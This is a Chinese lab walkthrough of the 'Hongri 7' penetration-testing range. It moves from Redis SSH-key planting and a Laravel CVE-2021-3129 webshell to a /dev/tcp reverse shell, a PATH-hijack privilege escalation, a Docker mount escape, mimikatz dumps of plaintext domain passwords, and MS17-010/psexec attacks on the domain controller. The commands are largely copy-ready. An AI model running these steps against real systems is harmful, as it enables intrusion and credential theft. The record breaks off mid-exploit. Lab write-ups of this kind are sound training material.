红日7-WP

网络拓扑图

外围打点

使用fscan进行初步信息收集

可以发现有一个redis的未授权访问的漏洞

能直接登录,接下来我们尝试去上传公钥

第一台

利用前面扫描到的redis未授权漏洞进行攻击

生成公钥:ssh-keygen -t rsa

写入公钥(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > key.txt

redis保存公钥 cat key.txt | redis-cli -h 192.168.111.20 -x set xxx

config set dir /root/.ssh/ 将写的目录设置在/root/.ssh/下
config set dbfilename authorized_keys 生成一个authorized_keys
save 保存 他会把你变量值也保存在authorized_keys
exit 退出

我们使用vsehll生成一个正向客户端上传到机器上进行正向连接

vshell上线后即拿下这个靶机

内网信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
./fscan.x64.elf -h 192.168.52.10/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.52.10   is alive
(icmp) Target 192.168.52.20   is alive
(icmp) Target 192.168.52.30   is alive
[*] Icmp alive hosts len is: 3
192.168.52.30:445 open
192.168.52.30:139 open
192.168.52.30:135 open
192.168.52.10:81 open
192.168.52.10:80 open
192.168.52.20:22 open
192.168.52.10:22 open
192.168.52.30:8080 open
192.168.52.20:8000 open
192.168.52.10:6379 open
[*] alive ports len is: 10
start vulscan
[*] WebTitle: http://192.168.52.10      code:502 len:584    title:502 Bad Gateway
[+] Redis:192.168.52.10:6379 unauthorized file:/root/.ssh/authorized_keys
[+] Redis:192.168.52.10:6379 like can write /root/.ssh/
[+] Redis:192.168.52.10:6379 like can write /var/spool/cron/
[*] WebTitle: http://192.168.52.30:8080 code:200 len:10065  title:通达OA网络智能办公系统
[*] NetBios: 192.168.52.30   PC1.whoamianony.org                 Windows 7 Professional 7601 Service Pack 1 
[+] 192.168.52.30       MS17-010        (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle: http://192.168.52.20:8000 code:200 len:17474  title:Laravel
[+] InfoScan:http://192.168.52.30:8080 [通达OA] 
[*] WebTitle: http://192.168.52.10:81   code:200 len:17474  title:Laravel
[+] http://192.168.52.30:8080 tongda-user-session-disclosure 
[+] InfoScan:http://192.168.52.20:8000 [Laravel] 
[+] SSH:192.168.52.10:22:root 123456
[+] InfoScan:http://192.168.52.10:81   [Laravel] 
[+] http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129 
[+] http://192.168.52.10:81 poc-yaml-laravel-cve-2021-3129 
已完成 9/10 [-] ssh 192.168.52.20:22 root password ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.52.20:22 root 1 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

我们上传一个fscan之后对另一个内网网卡进行扫描发现有其他两台机器,并且其他机器能够扫出来很多信息,比如

http://192.168.52.10:81 poc-yaml-laravel-cve-2021-3129

那么我们下一步对这个进行分析

第二台

根据前面使用fscan扫描到的内容发现有个cve

漏洞利用

在网上下载exp后上传利用

ajisai-babu/CVE-2021-3129-exp: Laravel Debug mode RCE漏洞(CVE-2021-3129)poc / exp

1
2
3
python CVE-2021-3129.py -u http://192.168.52.10:81 --exp -p socks5://192.168.113.154:1001
[✅]检测到漏洞![🚩]url: http://192.168.52.10:81 [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64
[OK] 成功写入webshell, 访问地址 http://192.168.52.10:81/shell.php , 密码 whoami

蚁剑连接上去之后发现是在docker之中

那么我们进行一下信息收集。

接下来我们去获取一个稳定的shell,反弹到web1机器上

(www-data:/bin) $ bash -c ‘bash -i > /dev/tcp/192.168.52.10/4444 0<&1 2>&1’

我们通过ls -al可以发现这应该是在一个docker容器里面,因为存在.dockerenv文件。

docker逃逸

docker逃逸一般的手法就是利用docker容器配置不当,docker历史漏洞。我们先查看一下docker的配置,如是否开启了特权模式,或者是否其存在挂载问题

1
2
3
4
5
6
7
www-data@8e172820ac78:/bin$ cat /proc/self/status |grep Cap
cat /proc/self/status |grep Cap
CapInh: 0000003fffffffff
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000

我们可以发现其CapEff: 0000000000000000并不是000000xfffffffff所以这可能并不是一个特权容器

但是之后我们利用常规思路find / -perm -u=s -type f 2>/dev/null发现了其他问题

寻找有权限的文件

1
2
3
4
5
6
7
8
9
10
11
12
www-data@8e172820ac78:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/home/jobs/shell
/bin/mount
/bin/su
/bin/umount

我们发现了有这么一个文件/home/jobs/shell很可疑

我们查看下他的内容

是一个elf文件运行一下,发现其执行的是ps指令

同时发现同文件夹下有个demo.c和ls文件疑似是源码

1
2
3
4
5
6
#include<unistd.h>
void main()
{ setuid(0);
  setgid(0);
  system("ps");
}

根据代码分析关键在于system(“ps”);,shell执行的就是ps指令那么我们修改他然后重编译即可

但是我们还可以发现demo.c我们并没有权限去进行编译所以我们需要寻找其他方法

1
2
3
4
5
6
www-data@8e172820ac78:/home/jobs$ ls -l
ls -l
total 24
-rw-r--r-- 1 root root    75 Feb 25  2021 demo.c
-rwsr-xr-x 1 root root 16712 Feb 25  2021 shell

尝试一下我们能不能伪造一个ps,来通过修改环境变量来进行提权

1
2
3
4
5
6
7
cd /tmp
echo "/bin/bash" > ps  # 这个命令的意思就是在/tmp的目录下生成一个ps文件,并且里面有生成shell的
chmod 777 ps   # 给予所有人都能执行的权限
echo $PATH 输出环境变量
export PATH=/tmp:$PATH #设置环境变量,在他路径前面加个/tmp
cd /home/jobs  #回到shell文件存在目录
./shell    #然后去执行

目前已经提权到了root,但是别忘了我们现在是在一个docker容器之中,但是目前的shell不好看我们改一下这是之前从别人博客学到的

python -c ‘import pty; pty.spawn(“/bin/bash”)’

我们现在来探查一下docker信息

1
2
3
4
5
6
7
8
root@8e172820ac78:/home/jobs#  cat /proc/self/status |grep Cap
cat /proc/self/status |grep Cap
CapInh: 0000003fffffffff
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000

发现其确实为特权容器,那就十分简单了,开始逃逸

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@8e172820ac78:/home/jobs# fdisk -l
fdisk -l
Disk /dev/sda: 10 GiB, 10737418240 bytes, 20971520 sectors
Disk model: VMware Virtual S
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00063af9

Device     Boot    Start      End  Sectors Size Id Type
/dev/sda1  *        2048 16779263 16777216   8G 83 Linux
/dev/sda2       16781310 20969471  4188162   2G  5 Extended
/dev/sda5       16781312 20969471  4188160   2G 82 Linux swap / Solaris

之后就可以进行挂载逃逸了

1
2
3
4
5
6
7
8
root@8e172820ac78:/# mkdir 123
mkdir 123
root@8e172820ac78:/# mount /dev/sda1 /123
mount /dev/sda1 /123
root@8e172820ac78:/# ls
ls
123  boot  etc   home  lib64  mnt  proc  run   srv  tmp  var
bin  dev   hack  lib   media  opt  root  sbin  sys  usr

之后我们就可以写入第一台机器的公钥进入该机器中

1
2
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBaz1SULVLesFG1OM3IvBugUvcDb2zalFv0yr8Y7pkTxv3B3vV37JiZ1nZdtlfTRxk7SuxRC75ornKhNNaTxI6lBWtjo2kmFnb9Y6E1YZ3r1VvP3tofRRZUa2S1lC96CzdF9Uv9+ehag5pUwoSr2B5zv6WuFX2eIaOq2ZR9z3qAEWPAyzszr/0Rv7RISk8W3QFzlu0mE/ln/iPJVHnKz/jSn6xfFR11zxDjn0D4Qyj1WmcUshfyKSp8TuFIC+5Lj51KUE4wMJe+ee2QJJKtl1GwO/nlDtFqYtjR1WR48HSAc2nnUO5mi7Iq2WWaL5aeSEeMEaMaTZuipznZSpdIuSV root@ubuntu
" >> /123/root/.ssh/authorized_keys

之后我们利用拿下的第一台机器生产的公钥进行连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@ubuntu:~/.ssh# ssh -i id_rsa root@192.168.52.20
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

Your Hardware Enablement Stack (HWE) is supported until April 2019.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

利用正向连接上传到vshell上面

第三台

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@ubuntu:/# ./fscan.x64.elf -h 192.168.52.30

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.52.30   is alive
[*] Icmp alive hosts len is: 1
192.168.52.30:8080 open
192.168.52.30:445 open
192.168.52.30:139 open
192.168.52.30:135 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://192.168.52.30:8080 code:200 len:10065  title:通达OA网络智能办公系统
[*] NetBios: 192.168.52.30   PC1.whoamianony.org                 Windows 7 Professional 7601 Service Pack 1 
[+] 192.168.52.30       MS17-010        (Windows 7 Professional 7601 Service Pack 1)
[+] InfoScan:http://192.168.52.30:8080 [通达OA] 
[+] http://192.168.52.30:8080 tongda-user-session-disclosure 
已完成 4/4
[*] 扫描结束,耗时: 8.147811558s
root@ubuntu:/#

我们发现第三台机器部署了一个通达oa的服务,我们来看一下

我们可以使用oa漏洞检测脚本查看到该站存在漏洞

我们发现第三台机器部署了一个通达oa的服务,我们来看一下

通过利用oa检测工具进行扫描发现存在一个文件上传漏洞我们利用这个上传一个木马

之后我们就可以使用蚁剑进行连接

我们其实可以看到这是一个windows机器。

我们同样将其上传到vshell上,生成一个windows正向连接的文件

内网信息收集:

使用vshell自带的mimikatz进行收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
[06/02 20:11:27] beacon> logonpasswords
[06/02 20:11:27] [*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[06/02 20:11:27] [+] host called home, sent: 297594 bytes
[06/02 20:11:28] [+] received output:

Authentication Id : 0 ; 13022187 (00000000:00c6b3eb)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : WHOAMIANONY
Logon Server      : DC
Logon Time        : 2026/6/2 17:09:00
SID               : S-1-5-21-1315137663-3706837544-1429009142-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : WHOAMIANONY
	 * LM       : 56b0cd8b125c05055e2dd9e955f18034
	 * NTLM     : ab89b1295e69d353dd7614c7a3a80cec
	 * SHA1     : 2bc4124300a6a8fc0ca10891823d36c64e4b3a40
	tspkg :	
	 * Username : Administrator
	 * Domain   : WHOAMIANONY
	 * Password : Whoami2021
	wdigest :	
	 * Username : Administrator
	 * Domain   : WHOAMIANONY
	 * Password : Whoami2021
	kerberos :	
	 * Username : Administrator
	 * Domain   : WHOAMIANONY.ORG
	 * Password : Whoami2021
	ssp :	
	credman :	

Authentication Id : 0 ; 1956007 (00000000:001dd8a7)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : WHOAMIANONY
Logon Server      : DC
Logon Time        : 2026/5/31 14:35:46
SID               : S-1-5-21-1315137663-3706837544-1429009142-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : WHOAMIANONY
	 * LM       : 56b0cd8b125c05055e2dd9e955f18034
	 * NTLM     : ab89b1295e69d353dd7614c7a3a80cec
	 * SHA1     : 2bc4124300a6a8fc0ca10891823d36c64e4b3a40
	tspkg :	
	 * Username : Administrator
	 * Domain   : WHOAMIANONY
	 * Password : Whoami2021
	wdigest :	
	 * Username : Administrator
	 * Domain   : WHOAMIANONY
	 * Password : Whoami2021
	kerberos :	
	 * Username : Administrator
	 * Domain   : WHOAMIANONY.ORG
	 * Password : Whoami2021
	ssp :	
	credman :	

Authentication Id : 0 ; 1440229 (00000000:0015f9e5)
Session           : Interactive from 1
User Name         : bunny
Domain            : WHOAMIANONY
Logon Server      : DC
Logon Time        : 2026/5/31 14:30:39
SID               : S-1-5-21-1315137663-3706837544-1429009142-1112
	msv :	
	 [00000003] Primary
	 * Username : bunny
	 * Domain   : WHOAMIANONY
	 * LM       : 7de10bf327ef7f2ac6ebe8776a153feb
	 * NTLM     : cc567d5556030b7356ee4915ff098c8f
	 * SHA1     : 3747632756191e3350e53211c63f804eb163638f
	tspkg :	
	 * Username : bunny
	 * Domain   : WHOAMIANONY
	 * Password : Bunny2021
	wdigest :	
	 * Username : bunny
	 * Domain   : WHOAMIANONY
	 * Password : Bunny2021
	kerberos :	
	 * Username : bunny
	 * Domain   : WHOAMIANONY.ORG
	 * Password : Bunny2021
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2026/5/31 14:28:29
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : PC1$
Domain            : WHOAMIANONY
Logon Server      : (null)
Logon Time        : 2026/5/31 14:28:29
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : PC1$
	 * Domain   : WHOAMIANONY
	 * NTLM     : 3e6a3d8c713b4821eaa51aab25f52074
	 * SHA1     : d8e1318a24c64b8fcc89dc8609b09af50342bacf
	tspkg :	
	wdigest :	
	 * Username : PC1$
	 * Domain   : WHOAMIANONY
	 * Password : %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol;
	kerberos :	
	 * Username : pc1$
	 * Domain   : whoamianony.org
	 * Password : %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol;
	ssp :	
	credman :	

Authentication Id : 0 ; 50798 (00000000:0000c66e)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2026/5/31 14:28:29
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : PC1$
	 * Domain   : WHOAMIANONY
	 * NTLM     : 3e6a3d8c713b4821eaa51aab25f52074
	 * SHA1     : d8e1318a24c64b8fcc89dc8609b09af50342bacf
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : PC1$
Domain            : WHOAMIANONY
Logon Server      : (null)
Logon Time        : 2026/5/31 14:28:29
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : PC1$
	 * Domain   : WHOAMIANONY
	 * Password : %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol;
	kerberos :	
	 * Username : pc1$
	 * Domain   : WHOAMIANONY.ORG
	 * Password : %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol;
	ssp :	
	credman :	
1
我们可以看到上方抓取到的明文账号密码可以看到域控的账号密码
Windows Administrator Whoami2021
Windows whoami Whoami2021
Windows bunny Bunny2021

并且我们还能发现一些网卡信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
C:\>ipconfig

Windows IP 配置


以太网适配器 本地连接 4:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::e891:67e5:e7ce:34c6%23
   IPv4 地址 . . . . . . . . . . . . : 192.168.93.20
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . :

以太网适配器 Npcap Loopback Adapter:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::b461:ccad:e30f:81ba%22
   自动配置 IPv4 地址  . . . . . . . : 169.254.129.186
   子网掩码  . . . . . . . . . . . . : 255.255.0.0
   默认网关. . . . . . . . . . . . . :

以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::90ef:688f:b9a8:fe03%11
   IPv4 地址 . . . . . . . . . . . . : 192.168.52.30
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.52.2

隧道适配器 isatap.{4DAEBDFD-0177-4691-8243-B73297E2F0FF}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :

隧道适配器 isatap.{55ECD929-FBB2-4D96-B43D-8FFEB14A169F}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :

隧道适配器 isatap.{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :

我们发现还有其他ip段信息我们使用fscan扫描一下看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
C:\>fscan.exe -h 192.168.93.20/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1

[2026-06-14 23:40:29] [INFO] 开始信息扫描
[2026-06-14 23:40:30] [INFO] CIDR范围: 192.168.93.0-192.168.93.255
[2026-06-14 23:40:30] [INFO] generate_ip_range_full
[2026-06-14 23:40:30] [INFO] 解析CIDR 192.168.93.20/24 -> IP范围 192.168.93.0-192.168.93.255
[2026-06-14 23:40:31] [INFO] 最终有效主机数量: 256
[2026-06-14 23:40:31] [INFO] 开始主机扫描
[2026-06-14 23:40:31] [INFO] 使用所有可用插件(已排除本地敏感插件)
[2026-06-14 23:40:32] [SUCCESS] 目标 192.168.93.10   存活 (ICMP)
[2026-06-14 23:40:32] [SUCCESS] 目标 192.168.93.20   存活 (ICMP)
[2026-06-14 23:40:33] [SUCCESS] 目标 192.168.93.30   存活 (ICMP)
[2026-06-14 23:40:33] [SUCCESS] 目标 192.168.93.40   存活 (ICMP)
[2026-06-14 23:40:39] [INFO] 存活主机数量: 4
[2026-06-14 23:40:40] [INFO] 有效端口数量: 233
[2026-06-14 23:40:40] [SUCCESS] 端口开放 192.168.93.10:22
[2026-06-14 23:40:41] [SUCCESS] 端口开放 192.168.93.10:80
[2026-06-14 23:40:46] [SUCCESS] 端口开放 192.168.93.30:88
[2026-06-14 23:40:50] [SUCCESS] 端口开放 192.168.93.20:110
[2026-06-14 23:40:51] [SUCCESS] 端口开放 192.168.93.20:135
[2026-06-14 23:40:51] [SUCCESS] 端口开放 192.168.93.20:139
[2026-06-14 23:40:51] [SUCCESS] 端口开放 192.168.93.40:135
[2026-06-14 23:40:51] [SUCCESS] 端口开放 192.168.93.30:135
[2026-06-14 23:40:52] [SUCCESS] 端口开放 192.168.93.30:139
[2026-06-14 23:40:52] [SUCCESS] 端口开放 192.168.93.40:139
[2026-06-14 23:40:52] [SUCCESS] 端口开放 192.168.93.30:389
[2026-06-14 23:40:53] [SUCCESS] 端口开放 192.168.93.20:445
[2026-06-14 23:40:53] [SUCCESS] 端口开放 192.168.93.30:445
[2026-06-14 23:40:54] [SUCCESS] 端口开放 192.168.93.40:445
[2026-06-14 23:41:30] [SUCCESS] 端口开放 192.168.93.10:8000
[2026-06-14 23:41:46] [SUCCESS] 端口开放 192.168.93.20:8080
[2026-06-14 23:43:08] [INFO] 存活端口数量: 16
[2026-06-14 23:43:08] [INFO] 开始漏洞扫描
[2026-06-14 23:43:09] [SUCCESS] NetInfo 扫描结果
目标主机: 192.168.93.30
主机名: DC
发现的网络接口:
   IPv4地址:
      └─ 192.168.93.30
[2026-06-14 23:43:09] [SUCCESS] NetInfo 扫描结果
目标主机: 192.168.93.40
主机名: PC2
发现的网络接口:
   IPv4地址:
      └─ 192.168.93.40
[2026-06-14 23:43:09] [SUCCESS] NetInfo 扫描结果
目标主机: 192.168.93.20
主机名: PC1
发现的网络接口:
   IPv4地址:
      └─ 192.168.52.30
[2026-06-14 23:43:10] [SUCCESS] NetBios 192.168.93.30   DC:DC.whoamianony.org            Windows Server 2012 R2 Datacenter 9600
[2026-06-14 23:43:10] [SUCCESS] 发现漏洞 192.168.93.20 [Windows 7 Professional 7601 Service Pack 1] MS17-010
[2026-06-14 23:43:10] [SUCCESS] NetBios 192.168.93.40   PC2.whoamianony.org                 Windows 7 Professional 7601 Service Pack 1
[2026-06-14 23:43:11] [SUCCESS] 发现漏洞 192.168.93.30 [Windows Server 2012 R2 Datacenter 9600] MS17-010
[2026-06-14 23:43:13] [SUCCESS] 发现漏洞 192.168.93.40 [Windows 7 Professional 7601 Service Pack 1] MS17-010
[2026-06-14 23:43:16] [SUCCESS] 网站标题 http://192.168.93.10:8000 状态码:200 长度:17474  标题:Laravel
[2026-06-14 23:43:17] [SUCCESS] 发现指纹 目标: http://192.168.93.10:8000 指纹: [Laravel]
[2026-06-14 23:46:09] [SUCCESS] 扫描已完成: 29/29
C:\>fscan.exe -h 169.254.129.186/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1

[2026-06-14 23:49:04] [INFO] 开始信息扫描
[2026-06-14 23:49:05] [INFO] CIDR范围: 169.254.129.0-169.254.129.255
[2026-06-14 23:49:05] [INFO] generate_ip_range_full
[2026-06-14 23:49:05] [INFO] 解析CIDR 169.254.129.186/24 -> IP范围 169.254.129.0-169.254.129.255
[2026-06-14 23:49:06] [INFO] 最终有效主机数量: 256
[2026-06-14 23:49:06] [INFO] 开始主机扫描
[2026-06-14 23:49:06] [INFO] 使用所有可用插件(已排除本地敏感插件)
[2026-06-14 23:49:07] [SUCCESS] 目标 169.254.129.186 存活 (ICMP)
[2026-06-14 23:49:13] [INFO] 存活主机数量: 1
[2026-06-14 23:49:13] [INFO] 有效端口数量: 233
[2026-06-14 23:49:15] [SUCCESS] 端口开放 169.254.129.186:135
[2026-06-14 23:49:15] [SUCCESS] 端口开放 169.254.129.186:110
[2026-06-14 23:49:15] [SUCCESS] 端口开放 169.254.129.186:139
[2026-06-14 23:49:16] [SUCCESS] 端口开放 169.254.129.186:445
[2026-06-14 23:49:25] [SUCCESS] 端口开放 169.254.129.186:8080
[2026-06-14 23:49:40] [INFO] 存活端口数量: 5
[2026-06-14 23:49:40] [INFO] 开始漏洞扫描
[2026-06-14 23:49:40] [SUCCESS] 发现漏洞 169.254.129.186 [Windows 7 Professional 7601 Service Pack 1] MS17-010
[2026-06-14 23:49:40] [SUCCESS] NetInfo 扫描结果
目标主机: 169.254.129.186
主机名: PC1
发现的网络接口:
   IPv4地址:
      └─ 192.168.52.30

根据推断192.168.93.0是和第二台机器在一个网段内,并且另外一个网段只有其自己一台机器那么重点应该放在192.168.93.30和192.168.93.40身上我们前面抓到了明文账号和密码,30这台机器开启了88端口大概率就是域控了

并且我们可以看到这两台机器都存在永恒之蓝漏洞

第四台

漏洞利用

我们利用msfconsole进行利用永恒之蓝漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
msf exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/admin/smb/ms17_010_command
msf auxiliary(admin/smb/ms17_010_command) >  set COMMAND whoami
COMMAND => whoami
msf auxiliary(admin/smb/ms17_010_command) > run
[-] Msf::OptionValidateError One or more options failed to validate: RHOSTS.
msf auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.93.30
RHOSTS => 192.168.93.30
msf auxiliary(admin/smb/ms17_010_command) > run
[*] 192.168.93.30:445     - Target OS: Windows Server 2012 R2 Datacenter 9600
[*] 192.168.93.30:445     - Built a write-what-where primitive...
[+] 192.168.93.30:445     - Overwrite complete... SYSTEM session obtained!
[+] 192.168.93.30:445     - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.93.30:445     - Getting the command output...
[*] 192.168.93.30:445     - Executing cleanup...
[+] 192.168.93.30:445     - Cleanup was successful
[+] 192.168.93.30:445     - Command completed successfully!
[*] 192.168.93.30:445     - Output for "whoami":

nt authority\system



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
msf exploit(windows/smb/psexec) >  set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) >  set RHOST 192.168.93.3
RHOST => 192.168.93.3
msf exploit(windows/smb/psexec) >  unset LHOST
Unsetting LHOST...
[!] Variable "LHOST" unset - but will use a default value still. If this is not desired, set it to a new value or attempt to clear it with set --clear LHOST
msf exploit(windows/smb/psexec) > unset LHOST
Unsetting LHOST...
[!] Variable "LHOST" unset - but will use a default value still. If this is not desired, set it to a new value or attempt to clear it with set --clear LHOST
msf exploit(windows/smb/psexec) > unset LPORT
Unsetting LPORT...
[!] Variable "LPORT" unset - but will use a default value still. If this is not desired, set it to a new value or attempt to clear it with set --clear LPORT
msf exploit(windows/smb/psexec) > exploit
[*] 192.168.93.3:445 - Connecting to the server...
[*] 192.168.93.3:445 - Authenticating to 192.168.93.3:445 as user 'Administrator'...
[-] 192.168.93.3:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: Unable to negotiate SMB1 with the remote host: Socket read returned nil
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/psexec) > set Proxies socks5:192.168.113.154:1003
Proxies => socks5:192.168.113.154:1003
msf exploit(windows/smb/psexec) > exploit
[*] 192.168.93.3:445 - Connecting to the server...
[*] 192.168.93.3:445 - Authenticating to 192.168.93.3:445 as user 'Administrator'...
[-] 192.168.93.3:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: Unable to negotiate SMB1 with the remote host: Socket read returned nil
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/psexec) >  set RHOST 192.168.93.30
RHOST => 192.168.93.30
msf exploit(windows/smb/psexec) > exploit
[*] 192.168.93.30:445 - Connecting to the server...
[*] 192.168.93.30:445 - Authenticating to 192.168.93.30:445 as user 'Administrator'...
[!] 192.168.93.30:445 - No active DB -- Credential data will not be saved!
[*] 192.168.93.30:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.93.30:445 - PowerShell found
[*] 192.168.93.30:445 - Selecting PowerShell target
[*] 192.168.93.30:445 - Powershell command length: 4457
[*] 192.168.93.30:445 - Executing the payload...
